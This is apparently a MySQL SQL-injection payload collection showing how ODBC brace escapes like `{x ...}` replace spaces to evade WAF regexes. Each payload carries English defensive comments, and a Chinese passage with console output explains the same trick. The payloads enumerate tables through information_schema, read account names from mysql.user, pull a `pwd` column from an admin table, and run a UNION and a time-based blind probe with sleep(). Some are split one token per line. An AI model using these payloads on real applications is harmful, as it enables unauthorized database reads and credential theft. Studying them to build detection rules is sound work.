-
-- Purpose: enumerate table names through a whitespace-free SELECT.
-- MySQL's ODBC escape syntax `{ident expr}` evaluates `expr` and discards
-- `ident`, so `{x ...}` stands in for the space a WAF regex keys on.
-- Read as one statement: select{x table_name}from{x information_schema.tables}
-- (the one-token-per-line layout here looks like an extraction artifact).
-- Defensive notes: a keyword-plus-space pattern does not see this form;
-- parameterised queries remove the vector entirely, and a detection rule
-- should key on `{` followed by an identifier inside a query parameter
-- rather than on whitespace.
select
{
x table_name
}
from
{
x information_schema
.
tables
}
-
-- Nested scalar subquery reading `pwd` with the same brace-for-space trick,
-- written for a URL query parameter: `%23` decodes to `#` and `+` to a space.
-- Defensive note: inspect the *decoded* parameter value; matching the raw
-- string misses both the braces and the encoded characters. `#` opens a
-- line comment in MySQL, so what the parser actually sees depends on the
-- receiving side's decoding — log both raw and decoded forms.
(select(select{x pwd}from{x %23@__admin}+limit+1))
-
-- Same escape with a different leading token (`1d` instead of `x`): the
-- identifier inside the braces is arbitrary, so a rule that matches the
-- literal `{x ` is too narrow — match `{` + identifier + expression.
select{x user}from{1d admin}
-
-- UNION-based variant: the braced subquery is the first column, `,1` pads
-- the column count to match the original SELECT; `+` is again a URL-encoded
-- space. Defensive note: `union select` survives here with ordinary spaces,
-- so the brace trick only hides the inner subquery — filters that match
-- `union` alone still fire; parameterisation is the real fix.
union select (select{x user}from{1d admin}+limit+1),1
-
-- Time-based blind probe: `1'` closes a quoted string literal, then
-- `if(..., sleep(1), 1)` delays the response when the comparison on the
-- first character of user() holds; `{1d user()}` hides the space inside
-- the subquery. The threshold 11 is just a probe value.
-- Defensive notes: `sleep(`/`benchmark(` in parameters and response-latency
-- outliers are strong detection signals; prepared statements remove the
-- string-closing `'` as a control character.
1' and if(ascii(substr((select{1d user()}),1,1))>11,sleep(1),1)
-
-- Reads account names from mysql.user without any whitespace:
-- select{x user}from{x mysql.user};
-- Defensive note: this only works when the application's DB account can
-- read mysql.user — a least-privilege account (no access to the `mysql`
-- schema) turns the query into a permission error.
select
{
x user
}
from
{
x mysql
.
user
};
-
-- Same read of mysql.user limited to a single row, for use as a scalar
-- subquery: select{x user}from{x mysql.user}limit 1;
-- Note `limit` and `1` are on their own lines here because the escape
-- only replaces the spaces around braces; the separating whitespace in
-- `limit 1` is still present in the tokenised form.
select
{
x user
}
from
{
x mysql
.
user
}
limit
1
;
mysql> select{x version()}from{x user};
+---------------+
| {x version()} |
+---------------+
| 5.5.20-log |
| 5.5.20-log |
| 5.5.20-log |
| 5.5.20-log |
+---------------+
4 rows in set (0.00 sec)

select{x a}from{x b} 。 b 为当前数据库存在的任意表名，a 就是你要返回的内容。我所能想到的场景就是获取 user()、version() 之类的。{} 代替空格绕过正则的检测，直接 select{x (user())} 或者 select(user())。
要获取其它信息的话,像这样。
mysql> select{x (select user from user limit 1)} from{x user};
+-------------------------------------+
| {x (select user from user limit 1)} |
+-------------------------------------+
| root |
| root |
| root |
| root |
+-------------------------------------+
去掉空格:
mysql>
-- Fully space-free form (section heading above: remove spaces):
-- select{x(name)}from{x(test)};
-- Wrapping the expression in parentheses also drops the space after the
-- escape identifier, so the statement contains no whitespace at all.
-- Defensive note: normalising on whitespace before pattern matching is
-- useless here; parse or tokenise the SQL instead, or bind values.
select
{
x
(
name
)}
from
{
x
(
test
)};
-- Table-name enumeration in the URL-encoded, parenthesised form:
-- select{x+table_name}from{x(information_schema.tables)}
-- `+` is presumably a URL-encoded space (as in the earlier examples);
-- the parentheses remove the remaining space after the identifier.
-- Defensive note: decode the parameter before inspection and treat
-- `information_schema` in a user-supplied value as a high-confidence signal.
select
{
x
+
table_name
}
from
{
x
(
information_schema
.
tables
)}